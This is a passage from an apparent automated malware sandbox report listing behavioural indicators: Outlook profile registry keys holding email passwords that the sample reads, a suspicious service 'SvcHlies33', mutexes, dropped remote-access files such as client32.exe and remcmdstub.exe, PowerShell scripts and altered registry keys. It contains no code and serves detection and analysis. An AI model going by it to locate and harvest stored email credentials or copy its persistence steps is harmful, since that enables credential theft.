  814. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  815.  
  816.  
  817. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
  818.  
  819.  
  820. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Server"
  821.  
  822.  
  823. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
  824.  
  825.  
  826. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  827.  
  828.  
  829. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Port"
  830.  
  831.  
  832. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
  833.  
  834.  
  835. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Server URL"
  836.  
  837.  
  838. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
  839.  
  840.  
  841. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  842.  
  843.  
  844. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Port"
  845.  
  846.  
  847. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  848.  
  849.  
  850. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Port"
  851.  
  852.  
  853. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  854.  
  855.  
  856. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  857.  
  858.  
  859. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Server"
  860.  
  861.  
  862. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP User"
  863.  
  864.  
  865.  
  866.  
  867. "Description": "Attempts to create or modify system certificates",
  868. "Details":
  869.  
  870.  
  871. "Description": "Collects information to fingerprint the system",
  872. "Details":
  873.  
  874.  
  875.  
  876. * Started Service:
  877. "VaultSvc",
  878. "WerSvc",
  879. "TermService",
  880. "UmRdpService",
  881. "SvcHlies33"
  882.  
  883.  
  884. * Mutexes:
  885. "0B7CAD14B68B2768236643",
  886. "Global\\CLR_CASOFF_MUTEX",
  887. "TSLicensingLock",
  888. "Local\\WERReportingForProcess1976",
  889. "Global\\\\xe5\\x88\\x90\\xc2\\x98",
  890. "Global\\\\xed\\x95\\xb0\\xc6\\xba",
  891. "WERUI_BEX64-82cb4fca2f0bf3fd7a75b67369b18e41a743e1"
  892.  
  893.  
  894. * Modified Files:
  895. "C:\\Users\\user\\AppData\\Local\\Temp\\785D.tmp",
  896. "C:\\Users\\user\\AppData\\Local\\Temp\\\\x7f\\x07",
  897. "\\??\\PIPE\\samr",
  898. "C:\\Users\\user\\AppData\\Local\\Temp\\bca8cea9..org\\xQLJ",
  899. "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe",
  900. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  901. "C:\\Windows\\sysnative\\LogFiles\\Scm\\3f357760-6247-4a1e-9c1b-f2dc4f9f4249",
  902. "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  903. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
  904. "C:\\Users\\user\\AppData\\Local\\Temp\\nsy52A1.tmp\\System.dll",
  905. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  906. "\\??\\PIPE\\srvsvc",
  907. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LYKKOICN04MDXEPL836O.temp",
  908. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF84d58d.TMP",
  909. "C:\\Windows\\Help\\tmp5211.dat",
  910. "C:\\Windows\\Help\\tmp5212.dat",
  911. "C:\\Windows\\Help\\tmp5213.dat",
  912. "C:\\Windows\\sysnative\\rfxvmt.dll",
  913. "C:\\Windows\\inf\\setupapi.dev.log",
  914. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  915. "\\??\\WMIDataDevice",
  916. "\\??\\PIPE\\lsarpc",
  917. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\asogaigsaug.dat",
  918. "C:\\Windows\\Help\\32151.ps1",
  919. "\\Device\\Termdd",
  920. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
  921. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  922. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  923. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
  924. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
  925. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab69CD.tmp",
  926. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar69CE.tmp",
  927. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep884.bin",
  928. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep764.zip",
  929. "C:\\Windows\\Temp\\client32.exe",
  930. "C:\\Windows\\Temp\\client32.ini",
  931. "C:\\Windows\\Temp\\HTCTL32.DLL",
  932. "C:\\Windows\\Temp\\msvcr100.dll",
  933. "C:\\Windows\\Temp\\nskbfltr.inf",
  934. "C:\\Windows\\Temp\\NSM.ini",
  935. "C:\\Windows\\Temp\\NSM.LIC",
  936. "C:\\Windows\\Temp\\pcicapi.dll",
  937. "C:\\Windows\\Temp\\PCICHEK.DLL",
  938. "C:\\Windows\\Temp\\PCICL32.DLL",
  939. "C:\\Windows\\Temp\\remcmdstub.exe",
  940. "C:\\Windows\\Temp\\TCCTL32.DLL",
  941. "C:\\Windows\\Temp\\cksini.exe",
  942. "C:\\Windows\\Temp\\updsvc.exe",
  943. "\\Device\\RdpDr",
  944. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  945. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERCBF2.tmp.appcompat.txt",
  946. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA3B.tmp.WERInternalMetadata.xml",
  947. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA7B.tmp.hdmp",
  948. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE682.tmp.mdmp",
  949. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\WERCBF2.tmp.appcompat.txt",
  950. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\WERDA3B.tmp.WERInternalMetadata.xml",
  951. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\WERDA7B.tmp.hdmp",
  952. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\WERE682.tmp.mdmp",
  953. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\Report.wer",
  954. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  955. "C:\\Windows\\sysnative\\Tasks\\updsvc",
  956. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
  957. "\\Device\\LanmanDatagramReceiver",
  958. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  959. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  960. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\Report.wer.tmp"
  961.  
  962.  
  963. * Deleted Files:
  964. "C:\\Users\\user\\AppData\\Local\\Temp\\nss4E8A.tmp",
  965. "C:\\Users\\user\\AppData\\Local\\Temp\\nsy52A1.tmp",
  966. "C:\\Users\\user\\AppData\\Local\\Temp\\nsy52A1.tmp\\System.dll",
  967. "C:\\Users\\user\\AppData\\Local\\Temp\\nsy52A1.tmp\\",
  968. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF84d58d.TMP",
  969. "C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  970. "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe",
  971. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1376.8705500",
  972. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1376.8705500",
  973. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1376.8705500",
  974. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab69CD.tmp",
  975. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar69CE.tmp",
  976. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep884.bin",
  977. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep764.zip",
  978. "C:\\Windows\\Temp\\client32.exe",
  979. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_7521tg.txt",
  980. "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
  981. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERCBF2.tmp",
  982. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERCBF2.tmp.appcompat.txt",
  983. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA3B.tmp",
  984. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA3B.tmp.WERInternalMetadata.xml",
  985. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA7B.tmp",
  986. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDA7B.tmp.hdmp",
  987. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE682.tmp",
  988. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERE682.tmp.mdmp",
  989. "C:\\Windows\\Tasks\\updsvc.job",
  990. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
  991. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
  992. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  993. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\\Report.wer.tmp"
  994.  
  995.  
  996. * Modified Registry Keys:
  997. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  998. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  999. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000_CLASSES\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  1000. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Start",
  1001. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
  1002. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\ErrorControl",
  1003. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  1004. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33",
  1005. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Type",
  1006. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\Start",
  1007. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ErrorControl",
  1008. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath",
  1009. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\DisplayName",
  1010. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ObjectName",
  1011. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  1012. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\DeleteFlag",
  1013. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  1014. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  1015. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  1016. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  1017. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  1018. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  1019. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  1020. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  1021. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  1022. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  1023. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  1024. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.bmp\\OpenWithProgids\\Paint.Picture",
  1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.cab\\OpenWithProgids\\CABFolder",
  1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.contact\\OpenWithProgids\\contact_wab_auto_file",
  1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.css\\OpenWithProgids\\CSSfile",
  1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.csv\\OpenWithProgids\\Excel.CSV",
  1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dib\\OpenWithProgids\\Paint.Picture",
  1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dll\\OpenWithProgids\\dllfile",
  1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithProgids\\Word.Document.8",
  1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docm\\OpenWithProgids\\Word.DocumentMacroEnabled.12",
  1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docx\\OpenWithProgids\\Word.Document.12",
  1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dot\\OpenWithProgids\\Word.Template.8",
  1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dotm\\OpenWithProgids\\Word.TemplateMacroEnabled.12",
  1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dotx\\OpenWithProgids\\Word.Template.12",
  1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.dwfx\\OpenWithProgids\\Windows.XPSReachViewer",
  1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.easmx\\OpenWithProgids\\Windows.XPSReachViewer",
  1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.edrwx\\OpenWithProgids\\Windows.XPSReachViewer",
  1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.emf\\OpenWithProgids\\emffile",
  1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.eprtx\\OpenWithProgids\\Windows.XPSReachViewer",
  1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.exe\\OpenWithProgids\\exefile",
  1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.fon\\OpenWithProgids\\fonfile",
  1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.gif\\OpenWithProgids\\giffile",
  1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.htm\\OpenWithProgids\\ChromeHTML",
  1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.html\\OpenWithProgids\\ChromeHTML",
  1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ico\\OpenWithProgids\\icofile",
  1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ini\\OpenWithProgids\\inifile",
  1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jfif\\OpenWithProgids\\pjpegfile",
  1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpe\\OpenWithProgids\\jpegfile",
  1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpeg\\OpenWithProgids\\jpegfile",
  1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jpg\\OpenWithProgids\\jpegfile",
  1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.jtx\\OpenWithProgids\\Windows.XPSReachViewer",
  1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.lnk\\OpenWithProgids\\lnkfile",
  1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.mht\\OpenWithProgids\\mhtmlfile",
  1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.mhtml\\OpenWithProgids\\mhtmlfile",
  1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.msg\\OpenWithProgids\\Outlook.File.msg.15",
  1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ocx\\OpenWithProgids\\ocxfile",
  1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.odt\\OpenWithProgids\\Word.OpenDocumentText.12",
  1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.otf\\OpenWithProgids\\otffile",
  1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.png\\OpenWithProgids\\pngfile",
  1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pot\\OpenWithProgids\\PowerPoint.Template.8",
  1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.potm\\OpenWithProgids\\PowerPoint.TemplateMacroEnabled.12",
  1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.potx\\OpenWithProgids\\PowerPoint.Template.12",
  1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppam\\OpenWithProgids\\PowerPoint.Addin.12",
  1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppsm\\OpenWithProgids\\PowerPoint.SlideShowMacroEnabled.12",
  1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppsx\\OpenWithProgids\\PowerPoint.SlideShow.12",
  1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ppt\\OpenWithProgids\\PowerPoint.Show.8",
  1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pptm\\OpenWithProgids\\PowerPoint.ShowMacroEnabled.12",
  1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pptx\\OpenWithProgids\\PowerPoint.Show.12",
  1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ps1xml\\OpenWithProgids\\Microsoft.PowerShellXMLData.1",
  1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.rle\\OpenWithProgids\\rlefile",
  1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.rtf\\OpenWithProgids\\Word.RTF.8",
  1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.scf\\OpenWithProgids\\SHCmdFile",
  1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.search-ms\\OpenWithProgids\\SearchFolder",
  1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.shtml\\OpenWithProgids\\ChromeHTML",
  1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sldm\\OpenWithProgids\\PowerPoint.SlideMacroEnabled.12",
  1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sldx\\OpenWithProgids\\PowerPoint.Slide.12",
  1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sys\\OpenWithProgids\\sysfile",
  1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.tif\\OpenWithProgids\\TIFImage.Document",
  1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.tiff\\OpenWithProgids\\TIFImage.Document",
  1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ttc\\OpenWithProgids\\ttcfile",
  1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.ttf\\OpenWithProgids\\ttffile",
  1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.txt\\OpenWithProgids\\txtfile",
  1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.vsto\\OpenWithProgids\\bootstrap.vsto.1",
  1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.wdp\\OpenWithProgids\\wdpfile",
  1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.wmf\\OpenWithProgids\\wmffile",
  1089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlam\\OpenWithProgids\\Excel.AddInMacroEnabled",
  1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xls\\OpenWithProgids\\Excel.Sheet.8",
  1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsb\\OpenWithProgids\\Excel.SheetBinaryMacroEnabled.12",
  1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsm\\OpenWithProgids\\Excel.SheetMacroEnabled.12",
  1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlsx\\OpenWithProgids\\Excel.Sheet.12",
  1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xlt\\OpenWithProgids\\Excel.Template.8",
  1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xltm\\OpenWithProgids\\Excel.TemplateMacroEnabled",
  1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xltx\\OpenWithProgids\\Excel.Template",
  1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xml\\OpenWithProgids\\xmlfile",
